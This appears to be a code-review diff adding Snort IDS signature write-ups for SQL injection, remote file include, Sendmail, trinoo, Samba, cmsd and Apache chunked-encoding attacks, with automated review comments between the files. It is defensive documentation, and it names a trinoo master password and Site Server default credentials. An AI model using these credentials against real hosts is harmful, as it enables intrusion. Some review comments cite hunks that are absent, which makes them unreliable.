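Review bot: the Detailed Information paragraph naming the procedure is broken across lines ("alter_priority_nvarchar2" on one line, a lone "." starting the next), which looks like a templating error; it should read as one sentence: "...in the procedure alter_priority_nvarchar2. This procedure is included in dbms_repcat." Affected Systems has a duplicated word ("Oracle Oracle9i"), and the Corrective Action sentence is missing its final period. Additional References is empty; the vendor alert for this batch of dbms_repcat overflows should be cited.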
--- /dev/null
+++ b/doc/signatures/100000697.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000697
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VCard PRO" application running on a webserver. Access to the file "search.php" with SQL commands being passed as the "event_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "event_id" parameter in the "search.php" script used by the "VCard PRO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VCard PRO
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
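Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application...") is generic credential-validation boilerplate that contradicts the first paragraph, which correctly describes an SQL injection via the "event_id" parameter; suggest dropping it or moving it after the injection-specific text. Typos: "running ona web server" should be "on a web server", and "an exploitation attempt has been attempted" in the Summary is redundant ("may indicate an exploitation attempt"). Formatting: the Sid value, Affected Systems and Contributors sections lack the blank line before "--" used everywhere else, and the file opens with two blank lines.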
--- /dev/null
+++ b/doc/signatures/1868.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1868
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
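Review bot: this hunk is word-for-word identical to the 865.txt hunk above apart from the sid, including the "running ona web server" typo and the unwrapped "exploited by the attacker." line, so it gives no way to tell sid 1868 from sid 865. Suggest adding the specific CGI script or request this rule matches and fixing the shared typos in both files at once.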
--- /dev/null
+++ b/doc/signatures/662.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+662
+
+--
+Summary:
+This event is generated when maliciously formatted "mail from" text is supplied.
+
+--
+Impact:
+Attempted administrator access.  A successful attack can allow remote execution of commands with root privileges. 
+
+--
+Detailed Information:
+A vulnerability exists in older versions of Sendmail that incorrectly parses message headers.  This vulnerability can allow anattacker to execute arbitrary commands as root.
+
+--
+Affected Systems:
+Sendmail versions prior to 8.6.10 and any version based on 5.x.
+
+--
+Attack Scenarios:
+An attacker can craft a malicious mail header that executes a command. 
+
+--
+Ease of Attack:
+Easy.  Use a maliciously formatted header.
+ 
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to version 8.6.10 or higher of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2308
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
+
+Arachnids:
+http://www.whitehats.com/info/IDS119
+
+
+--
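Review bot: typo in Detailed Information: "anattacker" should be "an attacker". Line L+ after "Ease of Attack" contains a single space instead of being empty, which will show up as trailing whitespace. "Easy." differs from the "Simple." wording used in the other files' Ease of Attack sections; suggest aligning. Corrective Action could also mention that the Summary's trigger ("mail from" text) means the event is observable on the SMTP stream, so it can be correlated with the MTA log of the receiving host.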
--- /dev/null
+++ b/doc/signatures/1580.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1580
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
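Review bot: the Summary and Detailed Information are fully generic ("a known vulnerability on a web server", "attack scenarios are legion") and Additional References is empty, so nothing here identifies what sid 1580 actually matches; the request path or component the rule looks for should be named. "attackers choosing" in Impact needs the possessive apostrophe.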
--- /dev/null
+++ b/doc/signatures/234.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+234
+
+--
+Summary:
+This event is generated when a trinoo DDoS attacker host communicates with a master host.  
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a trinoo attacker. If the listed destination IP is in your network, it may be a trinoo master.
+
+--
+Detailed Information:
+The trinoo DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, attackers communicate with masters to direct them to launch attacks.  An attacker may communicate with a master via TCP destination port 27665 with a string of "g0rave" in the payload.  This string is the default master startup password.
+
+--
+Affected Systems:
+Any trinoo compromised host.
+
+--
+Attack Scenarios:
+A trinoo attacker will communicate with masters to direct them to launch attacks.
+
+--
+Ease of Attack:
+Simple. trinoo code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+SecurityFocus:
+http://www.securityfocus.com/archive/1/37706
+
+CERT:
+http://www.cert.org/incident_notes/IN-99-07.html#trinoo
+
+--
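Review bot: the password in Detailed Information, "g0rave", is written with a digit zero; check it against the rule's content match and make the documentation use exactly the bytes the rule matches, since an O/0 mix-up here would send analysts looking through captures for a string the rule never fires on. False Positives "None Known." is also stronger than the match justifies: the rule keys on a short plaintext string to TCP/27665, so any other traffic to that port carrying it would trigger the event; say that in the False Positives section.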
--- /dev/null
+++ b/doc/signatures/3041.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3041
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
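Review bot: Detailed Information attributes the bug to "an integer overflow" in memory allocation while Attack Scenarios says the attacker must "overflow a buffer containing the information for the access control lists"; either state that the integer overflow in the allocation size is what leads to the heap buffer overflow, or pick one description, so the two sections agree. Additional References is empty even though Affected Systems pins a version ("Samba 3.0.8 and prior"); add the Samba advisory or CVE the version bound came from. Minor: missing space in "remote server.The problem", and "heterogenous" should be "heterogeneous".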
--- /dev/null
+++ b/doc/signatures/1714.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1714
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
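Review bot: the entry never names the CGI application or script the rule matches, yet Summary calls it "a known vulnerability in a CGI web application" and Ease of Attack says "Exploits exist."; an analyst cannot triage the event without the script, the parameter and the affected versions, and Additional References should carry the advisory those came from. Affected Systems ("All systems running CGI applications") should be narrowed accordingly. Typo in Detailed Information: "ona web server".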
--- /dev/null
+++ b/doc/signatures/100000771.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000771
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "results" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "results" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
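Review bot: the third paragraph of Detailed Information (the "validating the credentials of a client host" text) is the remote-file-include boilerplate and does not describe SQL injection; drop it, or replace it with what the "results" parameter feeds (a query built by string concatenation). False Positives "None known." is doubtful for a rule that matches SQL keywords in a free-form parameter; document which keyword(s) the rule looks for so legitimate hits can be recognised. Typo: "ona web server". The Sid block also lacks the blank line before "--" used by the other entries.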
--- /dev/null
+++ b/doc/signatures/100000417.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000417
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MyBloggie" application running on a webserver. Access to the file "scode.php" using a remote file being passed as the "mybloggie_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mybloggie_root_path" parameter in the "scode.php" script used by the "MyBloggie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MyBloggie
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
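Review bot: Attack Scenarios ("An attacker can access an authentication mechanism and supply his/her own credentials...") is the generic CGI text and does not describe the remote file include the rule detects; the scenario is a request to scode.php with mybloggie_root_path set to a URL on an attacker-controlled host, from which the PHP interpreter loads and executes the file. Additional References is empty; add the advisory. Typo: "ona web server".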
--- /dev/null
+++ b/doc/signatures/2195.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2195
+
+--
+Summary:
+This event is generated when an attempt is made to access alert.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Sun Microsystems' Cobalt RaQ server appliance.
+
+--
+Impact:
+System integrity, possible denial of service.
+
+--
+Detailed Information:
+The alert.cgi file on Sun Microsystems' Cobalt RaQ web server appliance does not properly parse HTML tags submitted in URLs. This can allow a malicious user to use a specially crafted URL to execute JavaScript to place scripts or content on the web server. In addition, an overly long URL could be used to crash the server.
+
+--
+Affected Systems:
+Any Cobalt RaQ 2.0, 3.0, or 4.0 server appliance.
+
+--
+Attack Scenarios:
+An attacker crafts a URL with JavaScript and passes the content to alert.cgi on a vulnerable RaQ server. The server then executes the JavaScript included in the URL, placing malicious content on the web server. An attacker could also send an overly long URL to alert.cgi, which will crash the server.
+
+--
+Ease of Attack:
+Simple. Proof of concepts exist.
+
+--
+False Positives:
+If a legitimate remote user accesses alert.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Workarounds have been provided on the BugTraq mailing list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101500887122597&w=2 for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4211
+
+--
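Review bot: Attack Scenarios ("The server then executes the JavaScript included in the URL, placing malicious content on the web server") misdescribes cross-site scripting, which the Summary correctly names: the script in the crafted URL is reflected by alert.cgi and runs in the browser of whoever opens the link, not on the RaQ itself. Detailed Information ("execute JavaScript to place scripts or content on the web server") has the same problem, and Impact should mention the client-side consequence (theft of an administrator's session or credentials) alongside the denial of service from the overly long URL.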
--- /dev/null
+++ b/doc/signatures/1271.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+1271
+
+--
+Summary:
+This event is generated when an attempt is made to probe a host for the
+rusers RPC service.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+The rusers RPC service is used to remotely list all logged in users on a
+machine. This information may be useful to an attacker when targeting a
+remote host.
+
+--
+Affected Systems:
+	All systems running the rusers RPC service
+ 
+--
+Attack Scenarios:
+An attacker runs a vulnerability assessment tool, or the standard Unix
+rusers command.  The attacker may use information gleaned from this to
+better target his attacks.
+
+--
+Ease of Attack:
+Simple. Tools to probe the rusers service come standard with most Unix variants.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the rusers service.
+
+Disallow access to RPC services from hosts external to the protected
+network
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
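Review bot: False Positives "None Known" contradicts Attack Scenarios, which says the standard Unix rusers command triggers the rule; any legitimate rusers use from inside the network (monitoring, administrators) will generate this event, so say so and suggest restricting the rule's source to external addresses. Typo in Contributors: "unkown".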
--- /dev/null
+++ b/doc/signatures/1908.txt
@@ -0,0 +1,70 @@
+Rule:
+
+Sid:
+1909
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) Calendar
+Manager Service daemon, cmsd.
+
+--
+Impact:
+Remote root access. The attack may allow execution of arbitrary commands
+with the privileges of root.
+
+--
+Detailed Information:
+The cmsd RPC service implements the Calendar Manager Service daemon that
+is often distributed with the Common Desktop Environment (CDE) and Open
+Windows. The Calendar Manager daemon provides appointment and scheduling
+functions for CDE. A buffer overflow exists in the rtable_insert()
+function because of improper bounds checking, allowing the execution of
+arbitrary commands with the privileges of root.  One possible exploit
+vector is by inserting appointments into the Calendar Manager database.
+ 
+--
+Affected Systems:
+	SCO Open UNIX 8.0
+	SCO UnixWare 7.1.1
+	HP-UX 10.20, 10.24, 10.30, 11.0
+	Sun Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, 7.0
+	Sun SunOS 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+The attacker can use the exploit code to overflow the buffer allowing
+execution of arbitrary commands with the privileges of root.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
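Review bot: the Sid in the file ("1909") does not match the filename (1908.txt); one of them is wrong, and since these documents are looked up by sid the entry will either be unreachable or describe the wrong rule. The "--" separator between "Rule:" and "Sid:" is also missing. Additional References is empty for a widely published root exploit; add the CERT advisory and CVE entry for the rpc.cmsd overflow, which would also let the Affected Systems list be checked.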
--- /dev/null
+++ b/doc/signatures/271.txt
@@ -0,0 +1,67 @@
+Rule:  
+--
+Sid:
+271
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of
+Service attack against a host or network by generating traffic between 
+your udp echo port and their udp chargen port.
+
+--
+Impact:
+Potential Denial of service (DoS) condition for the target host, hosts
+between the target host and the attacker, and more.
+
+--
+Detailed Information:
+Traffic was detected between the udp echo port on a host on the
+protected network and the udp chargen (character generator) service.  
+Due to the connectionless nature of udp, a single packet from the udp chargen
+service to a listening udp echo service will result in mass quantities
+of traffic back and forth between the two services.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+An attacker will find a host that still provides the udp chargen service
+and generate traffic between it and the udp echo service on a machine.
+If proper ingress/egress filtering is not in place, this traffic can be 
+trivially spoofed provided the attacker has elevated privledges on the 
+attacking/initiating machine (the source port being less than 1024).
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the chargen service unless it is absolutely needed, and apply
+ingress and egress filtering.
+
+Additionally, disable the udp echo service.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+
+--
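Review bot: Affected Systems is empty; fill it in (any host with the UDP echo or chargen service enabled, typically via inetd). The privilege sentence in Attack Scenarios ("provided the attacker has elevated privledges on the attacking/initiating machine (the source port being less than 1024)") runs two things together: spoofing the source address needs raw-socket access (root), and binding a source port below 1024 also needs root on classic Unix; state both plainly. Typo: "privledges".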
--- /dev/null
+++ b/doc/signatures/1817.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1817
+
+--
+Summary:
+This event is generated when an attempt is made to log on to Microsoft Site Server with a default account. 
+
+--
+Impact:
+Information gathering.  This attack may permit leaking of information associated with particular Site Server files.
+
+--
+Detailed Information:
+Microsoft Site Server is software for Windows NT servers that allows users to publish, find, and share information.  There is a vulnerability that allows leaking of information of some Site Server files when an attacker logs on with the username of 'LDAP_AnonymousUser' and a password of 'LdapPassword_1'.
+
+--
+Affected Systems:
+
+Microsoft Site Server 3.0 
+
+--
+Attack Scenarios:
+An attacker can log on to Site Server using a default username and password to view Site Server files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply Service Pack 4.
+
+
+--
+Contributors:
+Original rute writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11018
+
+--
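Review bot: Corrective Action "Apply Service Pack 4." is ambiguous; say whether it means Site Server 3.0 SP4 or Windows NT 4.0 SP4, since the entry refers to both products. Typo in Contributors: "rute" should be "rule". It would also help to state that the rule matches the literal credentials "LDAP_AnonymousUser" / "LdapPassword_1", so analysts know an alert means the default account was sent, not that the logon succeeded.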
--- /dev/null
+++ b/doc/signatures/2291.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2291
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
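Review bot: Attack Scenarios is the generic credentials text and contradicts Detailed Information, which describes PHP code execution and file inclusion through unchecked user input; the scenario should say which script and parameter of Advanced Poll 2.0.2 take the attacker's input and what gets included or executed. Additional References is empty although a specific version is named; add the advisory so the version can be verified.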
--- /dev/null
+++ b/doc/signatures/1367.txt
@@ -0,0 +1,56 @@
+Rule: 
+
+--
+Sid: 1367
+
+-- 
+Summary: 
+This event is generated when execution of a "mail" command is attempted via HTTP.
+
+-- 
+Impact: 
+Possible intelligence gathering. This may be an attempt to gain information using mail to access sensitive files on a webserver.
+
+-- 
+Detailed Information: 
+This may be an attempt to gain intelligence from sensitive system files on a webserver. This rule generates an event when a "mail" command followed by a space is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. 
+
+The "mail" command is used to read and send email on UNIX systems. The rule looks for the "mail" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "mail" command in the URL indicates that an attacker attempted to trick the web server into executing a system command in non-interactive mode i.e. without a valid shell session. 
+
+This rule may also generate an event if it detects this command in an unencrypted HTTP tunneling connection to the server or a shell connection through an exploit of the web server.
+
+-- 
+Attack Scenarios: 
+The attacker can make a standard HTTP request that contains the path to the "mail" command in the URI, which can then return requested files to an external destination.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+False Positives: 
+This event may be generated if "mail" followed by a space is present in a URI. For example, http://www.foo.com/mail /file.html
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Webservers should not be allowed to view or execute files and binaries outside of its designated web root or cgi-bin.
+
+This command may also be requested on a command line should the attacker gain access to the machine. 
+
+Non-essential binaries should be removed from a webserver once it is in production.
+
+--
+Contributors: 
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
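Review bot: the Affected Systems section is missing (Detailed Information runs straight into Attack Scenarios); add it, even if only "Any web server able to execute the mail binary". The Sid is written as "Sid: 1367" on one line, unlike the other entries. Corrective Action's first sentence has an agreement error ("Webservers should not be allowed ... outside of its"). Since the rule matches "mail" followed by a space anywhere in the URI, the False Positives example is good but could add query strings that contain the word "mail " as ordinary text.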
--- /dev/null
+++ b/doc/signatures/1808.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1808
+
+--
+Summary:
+An attacker is using exploit code for the Apache chunked encoding 
+vulnerability against your web server.
+
+--
+Impact:
+If successful, this exploit can allow attackers to cause code of their 
+choice to run on your server or cause
+a denial of service.
+
+--
+Detailed Information:
+Older versions of the Apache HTTP server suffered from a bug in the 
+routines that handled chunked encoding.
+This exploit takes advantage of this vulnerability.
+
+--
+Affected Systems:
+Version of Apache 1.3 up to and including 1.3.24 and versions of Apache 
+2.0 up to 2.0.36. All versions of Apache 1.2 are vulnerable.   Although 
+this vulnerability is present in all ports of Apache, the exploit code 
+detected by this signature appears to only work against systems running 
+BSD.
+
+--
+Attack Scenarios:
+An attacker can take advantage of a widely available exploit script to compromise the server.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This signature detects specific exploit code that targets systems 
+running BSD. It is certainly possible for this vulnerability to be 
+exploited in ways other than those detected by this signature.
+
+--
+Corrective Action:
